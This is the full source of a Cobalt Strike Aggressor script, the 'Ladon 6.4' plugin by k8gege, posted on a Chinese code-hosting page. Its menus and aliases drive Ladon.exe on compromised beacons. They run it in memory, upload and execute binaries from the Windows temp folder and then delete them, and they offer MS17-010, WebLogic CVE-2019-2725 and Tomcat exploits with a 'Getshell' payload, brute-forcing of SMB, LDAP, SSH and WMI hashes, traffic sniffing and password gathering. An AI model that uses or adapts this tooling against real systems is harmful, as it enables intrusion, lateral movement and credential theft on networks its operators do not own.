代码拉取完成,页面将自动刷新
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258
#Ladon 6.4 for Cobalt Strike
#author: k8gege
#blog: k8gege.org
#github: https://github.com/k8gege
#teston: CS 3.x & 4.0
#update: 20200426
#Some functions are not compatible with CS, please use exe version
#Brute-Force Not Support [VncScan MysqlScan OracleScan SSHscan] PassWord
alias Ladon {
if (-exists script_resource("Ladon.exe")) {
if ($2 eq "help"){
blog2($1, "Usage:");
#blog2($1, "Ladon 1");
blog2($1, "Ladon ip");
blog2($1, "Ladon ip scantype");
#blog2($1, "Ladon nocheck");
blog2($1, "Ladon nocheck ip");
blog2($1, "Ladon nocheck ip scantype");
blog2($1, "ScanType:(Discover/Brute/Encode/Exploit)");
blog2($1, "ip: [ip ip/24 ip/26 ip/8]");
blog2($1, "scantype: [OnlineIP OnlinePC OSscan CiscoScan]");
blog2($1, "scantype: [WebScan WebScan2 SameWeb UrlScan WhatCMS WebDir SubDomain HostIP DomainIP]");
blog2($1, "scantype: [MS17010 WeblogicPoc WeblogicExp PhpStudyPoc ActiveMQPoc TomcatPoc TomcatExp Struts2Poc]");
blog2($1, "scantype: [LdapScan FtpScan WmiScan SmbScan LdapScan VncScan SmbHashScan WmiHashScan]");
blog2($1, "scantype: [EnumMssql EnumShare EnumIIS EnumProcess GetCmdLine GetInfo GetInfo2 GetHtml AdiDnsDump]");
blog2($1, "scantype: [EnHex DeHex EnBase64 DeBase64]");
blog2($1, "scantype: [[Sniffer FtpSniffer HttpSniffer HttpDownload FtpDownload]]");
blog2($1, "Example: Ladon 192.168.1.8/24 OnlinePC");
blog2($1, "Example: Ladon 192.168.1.8/24 *.ini");
blog2($1, "Example: Ladon 192.168.1.8/24 *.ps1");
blog2($1, "Example: Ladon 192.168.1.8/24 *.dll(c#)");
blog2($1, "Example: Ladon 192.168.1.8/24 *.exe(c#)");
return;}else
{bexecute_assembly!($1, script_resource("Ladon.exe"), $2.' '.$3.' '.$4.' '.$5.' '.$6.' '.$7.' '.$8);}
}else {berror($1, "Ladon.exe does not exist :(");}
}
sub LadonStart {
blog2($bid,"Ladon ".$3["moudle"]);
bcd!($bid, "c:\\windows\\temp");
brm!($bid,"Ladon.exe");
brm!($bid,"netscan.dll");
#bshell!($bid,"del Ladon**.exe");
if($3["moudle"] !eq "Default"){
brm!($bid, "netscan.dll");
}
bupload!($bid, script_resource("bin\\Ladon".$3['clrver'].".exe"));
bmv!($bid, "Ladon".$3['clrver'].".exe", "Ladon.exe");
if($3["moudle"] !eq "Default"){
bupload!($bid, script_resource("bin\\".$3['moudle']."\\netscan".$3['clrver'].".dll"));
bmv!($bid, "netscan".$3['clrver'].".dll", "netscan.dll");
}
bshell!($bid, "Ladon.exe");
#bpause($1, 10000);
brm!($bid,"Ladon.exe");
if($3["moudle"] !eq "Default"){
brm!($bid, "netscan.dll");
}
}
sub LadonScan {
if (-exists script_resource("Ladon.exe")) {
if ($3['tar'] eq ""){
return;
}else
{
blog2($bid,"Ladon ".$3['tar'].' '.$3['moudle']);
bexecute_assembly!($bid, script_resource("Ladon.exe"), $3['tar'].' '.$3['moudle']);}
}else {berror($1, "Ladon.exe does not exist :(");}
}
sub GetInfo {
if (-exists script_resource("Ladon.exe")) {
if ($3['moudle'] eq ""){
return;
}else
{
blog2($bid,"Ladon ".$3['moudle']);
bexecute_assembly!($bid, script_resource("Ladon.exe"),$3['moudle']);}
}else {berror($1, "Ladon.exe does not exist :(");}
}
sub Sniffer {
if (-exists script_resource("Ladon.exe")) {
if ($3['tar'] eq ""){
return;
}else
{
blog2($bid,"Ladon ".$3['moudle'].' '.$3['tar']);
bexecute_assembly!($bid, script_resource("Ladon.exe"), $3['moudle'].' '.$3['tar']);}
}else {berror($1, "Ladon.exe does not exist :(");}
}
sub HttpDownload {
if (-exists script_resource("Ladon.exe")) {
if ($3['tar'] eq ""){
return;
}else
{
blog2($bid,"Ladon ".$3['moudle'].' '.$3['tar']);
bexecute_assembly!($bid, script_resource("Ladon.exe"), $3['moudle'].' '.$3['tar']);}
}else {berror($1, "Ladon.exe does not exist :(");}
}
sub ms17010 {
if (-exists script_resource("Ladon.exe")) {
if ($2 eq ""){
return;}else
{bexecute_assembly!($bid, script_resource("Ladon.exe"), $3['tar'].' MS17010');}
}else {berror($1, "Ladon.exe does not exist :(");}
}
alias CVE-2019-2725-POC {
if (-exists script_resource("Ladon.exe")) {
if ($2 eq ""){
return;}else
{bexecute_assembly!($1, script_resource("Ladon.exe"), $2.' WeblogicPoc');}
}else {berror($1, "Ladon.exe does not exist :(");}
}
alias CVE-2019-2725-EXP {
if (-exists script_resource("Ladon.exe")) {
if ($2 eq ""){
return;}else
{bexecute_assembly!($1, script_resource("Ladon.exe"), $2.' WeblogicExp');}
}else {berror($1, "Ladon.exe does not exist :(");}
}
popup beacon_bottom {
menu "K8Ladon" {
item("&Update", { url_open("https://k8gege.org/tags/Ladon/"); });
separator();
item "Discover" {
$bid = $1;
$dialog = dialog("Ladon Discover", %(tar => "",moudle => "OnlinePC",clrver => "35",bid => $bid), &LadonScan);
dialog_description($dialog, "Target: IP or CIDR or URL or Host or Domain");
drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("OnlinePC","OnlineIP","OSScan", "WebScan", "WhatCMS","CiscoScan","SameWeb","UrlScan","EnumMssql","EnumShare"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "Vulnerable" {
$bid = $1;
$dialog = dialog("Ladon Vulnerable", %(tar => "",moudle => "MS17010",clrver => "35",bid => $bid), &LadonScan);
dialog_description($dialog, "Target: IP or CIDR");
drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("MS17010","Struts2Poc","WeblogicPoc","PhpStudyPoc","ActiveMQPoc","TomcatPoc"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "Exploit" {
$bid = $1;
$dialog = dialog("Ladon Exploit", %(tar => "",moudle => "MS17010",clrver => "35",bid => $bid), &LadonScan);
dialog_description($dialog, "Target: IP or CIDR,Payload is Getshell");
drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("WeblogicExp","TomcatExp"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "Sniffer" {
$bid = $1;
$dialog = dialog("Ladon Sniffer", %(tar => "",moudle => "HttpSniffer",clrver => "35",bid => $bid), &Sniffer);
dialog_description($dialog, "Target: Current Host IP");
drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("HttpSniffer","FtpSniffer","Sniffer"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "Brute-Force" {
$bid = $1;
$dialog = dialog("Ladon Brute-Force", %(tar => "",moudle => "LdapScan",clrver => "35",bid => $bid), &LadonScan);
dialog_description($dialog, "Target: IP or CIDR or URL or Host<br>Brute-Force: Upload PassWord File to WorkDir");
drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("LdapScan","SmbScan","SmbHashScan","WmiHashScan","WmiScan","FtpScan","VncScan","MysqlScan","OracleScan","SSHscan","WeblogicScan","TomcatScan","HttpBasicScan","WebDir","SubDomain"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "HttpDownload" {
$bid = $1;
$dialog = dialog("Ladon Download", %(tar => "",moudle => "HttpDownload",clrver => "35",bid => $bid), &HttpDownload);
dialog_description($dialog, "Target: url");
drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("HttpDownload"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "DC/LDAP" {
$bid = $1;
$dialog = dialog("Ladon DC/LDAP", %(tar => "",moudle => "HttpDownload",clrver => "35",bid => $bid), &LadonScan);
dialog_description($dialog, "Target: IP");
drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("AdiDnsDump","LdapScan"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "Domain/IP" {
$bid = $1;
$dialog = dialog("Ladon Domain/IP", %(tar => "",moudle => "HttpDownload",clrver => "35",bid => $bid), &LadonScan);
dialog_description($dialog, "Target: Domain or HostName");
drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("HostIP","DomainIP"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "GetInfo" {
$bid = $1;
$dialog = dialog("Ladon GetInfo", %(tar => "",moudle => "GetCmdLine",clrver => "35",bid => $bid), &GetInfo);
dialog_description($dialog, "Get IIS/Process/CmdLine Info");
#drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("EnumIIS","EnumProcess","GetCmdLine","GetInfo","GetInfo2","GetHtml"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
item "PassWord" {
$bid = $1;
$dialog = dialog("Ladon PocScan", %(tar => "",moudle => "EnumIIS",clrver => "35",bid => $bid), &GetInfo);
dialog_description($dialog, "Get PassWord");
#drow_text($dialog, "tar", "Target:");
drow_combobox($dialog, "moudle", "Moudle:", @("EnumIIS"));
#drow_combobox($dialog, "clrver", "Version", @("35", "40"));
drow_checkbox($dialog, 'type', 'noping');
dbutton_action($dialog, "Start");
dialog_show($dialog);
}
}}
举报
请认真填写举报原因,尽可能描述详细。
请选择举报类型
误判申诉
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
马建仓 AI 助手
尝试更多
代码解读
代码找茬
代码优化